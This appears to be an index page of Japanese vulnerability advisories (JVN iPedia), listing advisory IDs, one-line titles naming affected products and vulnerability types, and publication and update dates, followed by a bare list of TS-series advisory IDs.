jvndb-2025-000070 "Gunosy" App vulnerable to insertion of sensitive information into sent data 2025-09-02T14:20+09:00 2025-09-09T09:51+09:00
jvndb-2025-000072 Obsidian GitHub Copilot Plugin stores sensitive information in cleartext 2025-09-05T16:52+09:00 2025-09-05T16:52+09:00
jvndb-2025-000073 RATOC RAID Monitoring Manager for Windows registers a Windows service with an unquoted file path 2025-09-05T16:20+09:00 2025-09-05T16:20+09:00
jvndb-2025-000071 "Yahoo! Shopping" App for Android fails to restrict custom URL schemes properly 2025-09-05T15:12+09:00 2025-09-05T15:12+09:00
jvndb-2025-000075 Multiple vulnerabilities in TkEasyGUI 2025-09-05T14:53+09:00 2025-09-05T14:53+09:00
jvndb-2025-000069 Web Caster V130 vulnerable to cross-site request forgery 2025-09-03T14:23+09:00 2025-09-03T14:23+09:00
jvndb-2025-000068 Seiko Solutions SkyBridge BASIC MB-A130 vulnerable to OS command injection 2025-09-01T16:21+09:00 2025-09-01T16:21+09:00
jvndb-2025-012659 Denial-of-service (DoS) vulnerability in Konica Minolta bizhub series 2025-09-01T15:22+09:00 2025-09-01T15:22+09:00
jvndb-2025-000067 Multiple vulnerabilities in multiple iND products 2025-08-29T14:47+09:00 2025-08-29T14:47+09:00
jvndb-2025-000064 Multiple vulnerabilities in SS1 2025-08-27T15:13+09:00 2025-08-27T15:13+09:00
jvndb-2025-000065 ScanSnap Manager installers vulnerable to privilege escalation 2025-08-27T14:22+09:00 2025-08-27T14:22+09:00
jvndb-2025-011884 FUJIFILM Healthcare Americas Synapse Mobility vulnerable to Privilege Escalation 2025-08-21T11:49+09:00 2025-08-25T10:38+09:00
jvndb-2025-000063 Western Digital Kitfox registers a Windows service with an unquoted file path 2025-08-22T13:37+09:00 2025-08-22T13:37+09:00
jvndb-2025-000062 Multiple vulnerabilities in Group-Office 2025-08-21T14:03+09:00 2025-08-21T14:03+09:00
jvndb-2025-000061 Multiple vulnerabilities in Movable Type 2025-08-20T15:30+09:00 2025-08-20T15:30+09:00
jvndb-2025-000059 Seagate Toolkit registers a Windows service with an unquoted file path 2025-08-14T12:32+09:00 2025-08-19T14:40+09:00
jvndb-2025-010854 Trend Micro Endpoint security products for enterprises vulnerable to multiple OS command injection 2025-08-07T12:25+09:00 2025-08-19T11:36+09:00
jvndb-2025-007521 Multiple Brother driver installers for Windows vulnerable to privilege escalation 2025-06-27T09:37+09:00 2025-08-19T11:29+09:00
jvndb-2025-000060 PgManage vulnerable to injection 2025-08-18T13:40+09:00 2025-08-18T13:40+09:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
ts-2025-005 TS-2025-005
ts-2025-004 TS-2025-004
ts-2025-003 TS-2025-003
ts-2025-002 TS-2025-002
ts-2025-001 TS-2025-001
ts-2024-013 TS-2024-013
ts-2024-012 TS-2024-012
ts-2024-011 TS-2024-011
ts-2024-010 TS-2024-010
ts-2024-009 TS-2024-009
ts-2024-008 TS-2024-008
ts-2024-007 TS-2024-007
ts-2024-006 TS-2024-006
ts-2024-005 TS-2024-005
ts-2024-004 TS-2024-004
ts-2024-003 TS-2024-003
ts-2024-002 TS-2024-002
ts-2024-001 TS-2024-001
ts-2023-009 TS-2023-009
ts-2023-008 TS-2023-008
ts-2023-007 TS-2023-007
ts-2023-006 TS-2023-006
ts-2023-005 TS-2023-005
ts-2023-004 TS-2023-004
ts-2023-003 TS-2023-003
ts-2023-002 TS-2023-002
ts-2023-001 TS-2023-001
ts-2022-005 TS-2022-005
ts-2022-004 TS-2022-004
ts-2022-003 TS-2022-003